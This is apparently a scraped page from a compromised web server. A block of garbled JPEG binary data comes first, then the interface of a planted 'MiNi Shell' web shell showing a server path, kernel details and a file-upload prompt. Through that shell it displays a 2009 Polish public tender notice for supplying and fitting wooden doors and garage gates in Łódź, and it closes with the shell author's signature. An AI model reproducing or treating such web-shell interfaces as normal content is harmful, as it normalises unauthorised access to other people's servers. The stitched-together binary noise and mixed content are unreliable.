JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20090819/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20090819/285482-N-2009.html

<p class="kh_header"><b>Łódź: Dostawa stolarki drzwiowej oraz wrót garażowych wraz z montażem w gminnych lokalach mieszkalnych i użytkowych.</b><br>
<b>Numer ogłoszenia: 285482 - 2009; data zamieszczenia: 19.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Nieruchomościami Łódź-Śródmieście "Centrum II" , ul. Dowborczyków 5, 90-019 Łódź, woj. łódzkie, tel. 042 2536419, faks 042 2536422.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.centrum2.com3.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa stolarki drzwiowej oraz wrót garażowych wraz z montażem w gminnych lokalach mieszkalnych i użytkowych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa stolarki drzwiowej oraz wrót garażowych wraz z montażem w gminnych lokalach mieszkalnych i użytkowych  z podziałem na dwa pakiety-zadania
 
CPV 45421000-4 - roboty w zakresie stolarki budowlanej
         45421131-1 - instalowanie drzwi
         44221240-9 - wrota garażowe

Zakres prac obejmuje:
1.1. Dostawę stolarki drzwiowej zewnętrznej, spełniającej następujące wymogi:
- stolarka drzwiowa zewnętrzna dotyczy wymiany drzwi wejściowych drewnianych pełnych do lokali, tym samym ich kształt i funkcja musi być zachowana,
stolarka dwukrotnie malowana
1.2. Zakres montażu obejmuje:
- demontaż starej stolarki drzwiowej,
-osadzenie stolarki drzwiowej pełnej drewnianej w przygotowanym otworze wraz z zamocowaniem i uszczelnieniem pianką oraz wykonaniem tynków ościeży zewnętrznych i wewnętrznych,
- zamontowanie progu drzwi
1.3. Dostarczona stolarka drzwiowa oraz okucia muszą posiadać aktualne certyfikaty i atesty oraz świadectwa dopuszczenia do stosowania w budownictwie, które należy dołączyć do oferty.
1.4. Przed przystąpieniem do realizacji prac Wykonawca jest zobowiązany do wykonania pomiarów z natury.
1.5. Do produkcji stolarki budowlanej - wrót garażowych, powinna być stosowana tarcica iglasta oraz półfabrykaty tarte odpowiadające normom państwowym. Wilgotność bezwzględna drewna powinna zawierać się w granicach 10-16%.
1.6. Okucia budowlane:
Jeden zamek wpuszczany z wkładką Yale. Każdy wyrób stolarki budowlanej powinien być wyposażony w okucia zamykające, łączące, zabezpieczające i uchwytowo-osłonowe. Okucia powinny odpowiadać normom państwowym, w przypadku braku takich norm - wymaganiom określonym w świadectwie ITB, dopuszczającym do stosowania wyroby stolarki budowlanej wyposażonej w okucia na które nie została ustanowiona norma.
1.7.Środki do impregnowania wyrobów stolarskich.
Elementy stolarki budowlanej powinny być zabezpieczone przed korozją biologiczną. Doboru środków impregnacyjnych należy dokonać zgodnie z wytycznymi stosowania środków ochrony drewna podanymi w świadectwach ITB.
1.8. Do szklenia należy stosować szkło płaskie, walcowane wg PN-78/B-13050.
1.9. Normy:
-PN-C-04906 - środki ochrony drewna- ogólne wymagania i badania,
-PN-D-01001- Tarcica. podział nazwy i określenia,
-PN-75/B-94000 - Okucia budowlane. Podział.
Prace należy wykonać zgodnie z załączoną specyfikacją techniczną wykonania i odbioru robót ( załącznik nr 8 i 8.1 do siwz) oraz poleceniami  inspektora nadzoru
1.10.Wykonawca ma prawo złożyć tylko jedną ofertę 
1.11.Zamawiający informuje, iż nie przewiduje możliwości udzielenia zamówień uzupełniających, o których mowa w art. 67 ust.1 pkt.6 ustawy Pzp.
1.12.Zamawiający nie dopuszcza składania ofert  wariantowych. 
1.13 Zamawiający informuje, że Wykonawca może złożyć ofertę na jeden lub dwa pakiety
1.14.Zamawiający zastrzega możliwość zmiany miejsca montażu stolarki drzwiowej w przypadkach gdy zostanie ona wymieniona przez najemcę lokalu bez powiadomienia Zamawiającego , wykupu lokalu przez Najemcę, lub zmianą wielkości zasobów w trakcie realizacji przyszłej umowy spowodowanych między innymi: przejęciem nieruchomości przez właścicieli, co będzie stanowiło podstawę do stosownej zmiany umowy
1.15.Zamawiający wymaga, aby Wykonawca udzielił gwarancji na okres nie krótszy niż 24 miesiące.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.42.10.00-4, 45.42.11.31-1, 44.22.12.40-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 3.1 O zamówienie mogą ubiegać się Wykonawcy, którzy:

3.1.1. posiadają uprawnienia do wykonywania określonej działalności lub czynności,   
3.1.2. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami niezbędnymi  do wykonania zamówienia
3.1.4.znajdują się w sytuacji ekonomicznej i finansowej zapewniającej  wykonanie   zamówienia,  
3.1.5.nie podlegają wykluczeniu z postępowania o udzielenie zamówienia (art. 24 ust. 1 i 2        ustawy Pzp.)
Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt. 4 SIWZ.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 4.1 W celu potwierdzenia spełnienia warunków udziału w postępowaniu oferta musi zawierać następujące dokumenty lub oświadczenia:
4.1.1 aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do     ewidencji działalności gospodarczej - oryginał lub kserokopia potwierdzona za zgodność z 
oryginałem przez uprawnionego Wykonawcę, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
 4.1.2  oświadczenia wykonawcy lub aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, oryginał lub kserokopia poświadczona   za zgodność z  oryginałem przez uprawnionego Wykonawcę
4.1.3 oświadczenie  , że wykonawca spełnia warunki udziału w postępowaniu, określone w  art. 22 ust. 1pkt 1-3 ustawy  , zał nr 4 do siwz
4.1.4 oświadczenie  , że wykonawca nie podlega wykluczeniu z postępowania o udzielenia zamówienia publicznego zgodnie z art. 24 ust 1 i 2 ustawy P.z.p, zał nr   5 do siwz
4.1.5 wykaz  minimum dwóch kontraktów wykaz  minimum dwóch kontraktów odpowiadających swoim rodzajem robotom stanowiącym przedmiot zamówienia( całości lub części)  o łącznej wartości  nie mniejszej niż 20000zł( dwadzieścia tysięcy złotych)  w okresie ostatnich pięciu lat tj. do   terminu składania ofert ,a jeżeli okres    prowadzenia działalności jest krótszy- w tym okresie,  z podaniem jego wartości,  przedmiotu, dat wykonania i odbiorców zał. nr 6    do siwz - oryginał   oraz załączenie dokumentów potwierdzających, że usługa ta została wykonana należycie. Referencje muszą być podpisane przez osobę uprawnioną do reprezentowania podmiotu je wystawiającego oraz posiadać datę ich wystawienia.
4.1.6 wykaz  osób i podmiotów, które  będą uczestniczyć w realizacji zamówienia wraz z zakresem wykonywanych przez nich czynności i kwalifikacji zał. nr 7 do siwz - w formie oryginału oraz kserokopiami posiadanych aktualnych uprawnień poświadczonych  za zgodność z  oryginałem przez uprawnionego wykonawcę w tym:
jedna osoba odpowiedzialna za realizację zamówienia, uprawniona do kontaktów z Zamawiającym- może być właściciel.
4.1.8 polisę a w przypadku jej braku dołączenie innego dokumentu potwierdzającego że wykonawca jest  ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności  gospodarczej na minimalną łączną kwotę 50000.00zł ( pięćdziesiąt tysięcy) -oryginał lub  kserokopia poświadczona za  zgodność z  oryginałem przez uprawnionego Wykonawcę. W przypadku gdy okres ważności polisy jest   krótszy od    terminu związania ofertą -do polisy należy dołączyć zobowiązanie Wykonawcy do przedłużenia ważności ubezpieczenia na czas realizacji zamówienia.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 90</li>
<li>2 - gwarancja - 10</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.centrum2.com3.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Administracja Nieruchomościami Łódź- Śródmieście CENTRUM II, 90-019 Łódź, ul.Dowborczyków 5 pokój nr 15 lub 19.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.09.2009 godzina 09:00, miejsce: Administracja Nieruchomościami Łódź- Śródmieście CENTRUM II, 90-019 Łódź, ul.Dowborczyków 5 pokój nr 19 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com